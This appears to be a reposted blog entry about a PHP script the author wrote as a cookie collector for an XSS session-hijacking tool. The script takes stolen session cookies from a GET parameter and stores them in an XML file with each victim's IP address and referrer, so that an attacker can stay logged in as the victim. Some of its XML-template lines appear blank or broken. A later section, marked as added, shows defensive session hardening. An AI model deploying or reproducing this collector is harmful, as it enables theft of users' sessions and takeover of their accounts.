
PHP script with XSS tool SessionIE

WBOY
2016-07-13 17:21:38

What I wrote is purely for fun and not very interesting. In the final analysis, it just manipulates XML. It came about because http://www.cncert.net released a new XSS exploitation tool on our mailing list a few days ago. It is similar to the foreign tool Hamster: it refreshes regularly on the client to keep the session from timing out, so after a victim has been hit by the cross-site script once, the attacker can remain logged in. The tool is written in .NET. For convenience, the script that collects cookies is required to save them as an XML file. He provided an ASP program. I only had PHP hosting space, so I wrote a PHP program for testing.
Code:

<?php
date_default_timezone_set("Asia/Chongqing");

$my_file = "cookie.xml";

if( ! isset( $_GET["x"] ) )
{
exit;
}

$my_cookie = $_GET["x"];
if( $_GET["x"] != "" )
{
if( ! file_exists( $my_file ) )
{
CreateXmlFile( );
}

AddData( $my_cookie );
}

function CreateXmlFile( )
{
global $my_file;

$fp = fopen( $my_file, "wb" );
if( ! $fp )
{
exit;
}

fwrite( $fp, " " );
fwrite( $fp, " " );
fwrite( $fp, " " );
fwrite( $fp, "
" );
fwrite( $fp, "
" );

fclose( $fp );
}

function AddData( $my_cookie )
{
global $my_file;

$doc = new DOMDocument( );
$doc->load( $my_file );
$doc->formatOutput = true;

$treeroot = $doc->getElementsByTagName( "treeroot" )->item(0);
$item = $doc->createElement( "item" );
$treeroot->appendChild( $item );

if( isset( $_SERVER["REMOTE_HOST"] ) )
{
$remote_host = $_SERVER["REMOTE_HOST"];
}
elseif( isset( $_SERVER["REMOTE_ADDR"] ) )
{
$remote_host = $_SERVER["REMOTE_ADDR"];
}
else
{
$remote_host = "NotCare";
}
$title = $doc->createElement( "title", $remote_host );
$item->appendChild( $title );

if( isset( $_SERVER["HTTP_REFERER"] ) )
{
$refer = $_SERVER["HTTP_REFERER"];
}
else
{
$refer = "http://yahoo.cn";
}
$link = $doc->createElement("link", $refer);
$item->appendChild( $link );

$src_ip = $doc->createElement( "src_ip", $_SERVER["REMOTE_ADDR"] );
$item->appendChild( $src_ip );

$src_os = $doc->createElement( "src_os", "NotCare" );
$item->appendChild( $src_os );

$pubDate = $doc->createElement( "pubDate", date( "r" ) );
$item->appendChild( $pubDate );

$description = $doc->createElement( "description", $my_cookie );
$item->appendChild( $description );

$doc->save( $my_file );
}

?>
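
The collector above depends on page script being able to read the session cookie, and the tool's keep-alive depends on activity alone extending the session. The following added example (not part of the original post or the tool) shows server-side session settings that remove both conditions; the constant names and `$_SESSION` keys are assumptions of this sketch.

```php
<?php
// Added example, not from the original post. Needs PHP >= 7.3 and HTTPS.
// Constant names and $_SESSION keys are assumptions of this sketch.
const IDLE_LIFETIME     = 15 * 60;   // seconds of inactivity allowed
const ABSOLUTE_LIFETIME = 8 * 3600;  // hard cap, regardless of activity

// Pure validity check. The idle test alone is satisfied forever by a client
// that refreshes periodically; the created_at test is not.
function session_is_valid(array $s, int $now): bool
{
    if (!isset($s['created_at'], $s['last_seen'])) {
        return false;
    }
    return ($now - $s['last_seen'] <= IDLE_LIFETIME)
        && ($now - $s['created_at'] <= ABSOLUTE_LIFETIME);
}

function start_hardened_session(): void
{
    ini_set('session.use_strict_mode', '1');  // reject ids the server never issued
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,   // hides the session id from document.cookie
        'samesite' => 'Lax',
    ]);
    session_start();
    $now = time();
    if ($_SESSION !== [] && !session_is_valid($_SESSION, $now)) {
        $_SESSION = [];               // drop the expired state
        session_regenerate_id(true);  // and invalidate the old id
    }
    if ($_SESSION === []) {
        $_SESSION['created_at'] = $now;
    }
    $_SESSION['last_seen'] = $now;
}

if (PHP_SAPI === 'cli') {
    // Constructed scenario: a captured session refreshed every 5 minutes.
    $s = ['created_at' => 0, 'last_seen' => 0];
    for ($t = 300; session_is_valid($s, $t); $t += 300) {
        $s['last_seen'] = $t;
    }
    echo "keep-alive session rejected at t={$t}s\n";
} else {
    start_hardened_session();
}
```

Run from the command line, the script simulates the periodic refresh and reports when the absolute cap ends the session; included from a web request, it starts the hardened session.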
